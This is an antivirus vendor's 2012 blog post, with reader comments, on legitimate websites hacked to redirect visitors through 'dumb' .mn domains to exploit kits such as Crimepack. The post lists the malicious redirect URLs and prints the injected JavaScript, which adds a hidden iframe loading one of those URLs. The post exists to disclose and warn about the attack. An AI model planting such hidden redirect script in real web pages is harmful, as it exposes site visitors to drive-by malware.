Protecting over 200 million PCs, Macs, & Mobiles – more than any other antivirus

March 15th, 2012

Surprising hack found on multiple sites

From the “It-could-happen-to-you” file:  We innocently clicked on a link which was promoted today on a trustworthy company’s Facebook page.  To our surprise, avast! blocked it as a malicious URL.

When we attempted to open the URL, it was redirected to dumb.cn.mn which triggered the blocking action. The only content on dumb.cn.mm is one word – GOTCHA!

Senior Virus analyst, Jan Sirmer confirmed the attack when we couldn’t repeat the block. “The site, smcitizens.com, was hacked for sure, and redirects to a black hole site,” he said. “Malicious script on the site is checking visitor’s cookies, which is the reason why you don’t see the warning more than once.”

He went on to explain, “We receive only one word: GOTCHA. It’s probably because the attackers running on dumb site’s database with visiting IP addresses, and if they found this IP, only GOTCHA is returned. I think it helps them to be more secure from malware analysts and users looking into how they have been infected.”

After looking into the hack further, Sirmer discovered that the link to dumb.cn.mn, or its variations, was injected to other legitimate sites too. Those links then led to malicious sites containing a black hole exploit kit.

Here is a list of some other dumb sites used as links in hacked legitimate websites:

  • dumb.au.mn/in.cgi?2
  • dumb.cn.mn/in.cgi?2
  • dumb.eu.mn/in.cgi?2
  • dumb.fr.mn/in.cgi?2
  • dumb.uk.mn/in.cgi?2
  • dumb.us.mn/in.cgi?2
  • dumb.jp.mn/in.cgi?2
  • dumb.nl.mn/in.cgi?2

Sirmer discovered that malicious site fckarpaty.in is one of the malicious sites where users were redirected from one of  the dumb sites. fckarpaty.in includes a well-known exploit pack called Crimepack. This exploit pack uses a Java vulnerability and silently downloads malicious Java, PDF and flesh files onto users computers.

In the last four days, Sirmer found that the bad guys injected a link to one of the dumb sites in 138 unique legitimate sites that were visited by avast! users. This is not such a huge number, but the attackers focused on sites like smcitizens.com which has lots of visitors.

An example of injected code:

if (document.getElementsByTagName(‘body’)[0]) { iframer(); } else { document.write(“<iframe src=’http://dumb.cn.mn/in.cgi?2′ width=’10′ height=’10′ style=’visibility:hidden;position:absolute;left:0;top:0;’></iframe>”); } function iframer() { var f = document.createElement(‘iframe’); f.setAttribute(‘src’, ‘http://dumb.cn.mn/in.cgi?2′); f.style.visibility = ‘hidden’; f.style.position = ‘absolute’; f.style.left = ’0′; f.style.top = ’0′; f.setAttribute(‘width’, ’10′); f.setAttribute(‘height’, ’10′); document.getElementsByTagName(‘body’)[0].appendChild(f); }

An image of our first visit to smcitizens.com.

 

And the second visit. Images provided by avast! Virus Lab.

 

This image has been marked to show the redirection to dumb.cn.mn.

  1. Tech
    March 15th, 2012 at 03:12 | #1

    Sirmer always doing a good hard work…
    I’m jealous, because it’s difficult to get some info from him for the blog :)

  2. sourov00
    March 15th, 2012 at 11:16 | #2

    Avast is the best Virus Scanner in the whole world……

    I love AVAST!!! :D

  3. March 15th, 2012 at 13:23 | #3

    @Tech
    Thanks for compliment Tech.
    I’ll try to improve my information sharing skill for the next time :)

  4. iGiedrius
    March 15th, 2012 at 18:23 | #4

    Hi, thanks for identifying the issue, any ideas how to solve this? I ran a scan on a number of other web security sites and none of them identify the site as suspicious. I deleted the post in question, so not sure if the hack was only on that post or on my server in general as can’t find any problems with any of the online tools.

    thanks,
    Giedrius
    Social Media Citizens

  5. iGiedrius
    March 15th, 2012 at 19:01 | #5

    Actually just downloaded your software and checked the copy of smcitizens.com on my PC and it didn’t identify any threats as well. Something really weird is happening.

  6. March 15th, 2012 at 22:33 | #6

    @iGiedrius
    I’m trying to figure out how the bad guys injected those websites.
    Can you give me answer to one question please? Do you use a webkit?
    Thanks for answer

  7. March 16th, 2012 at 01:00 | #7

    I have seen this in.cgi?2 page before. It appeared quite a bit in the avast forum under the guise of js:Redirector-NT [Trj].

    The domain that it redirected to was not a constant, but the cgi page was.

    It appears that the script has changed somewhat, but I guess it still has the same effect.

  8. iGiedrius
    March 16th, 2012 at 02:15 | #8

    no I don’t you use a webkit.

Comments are closed.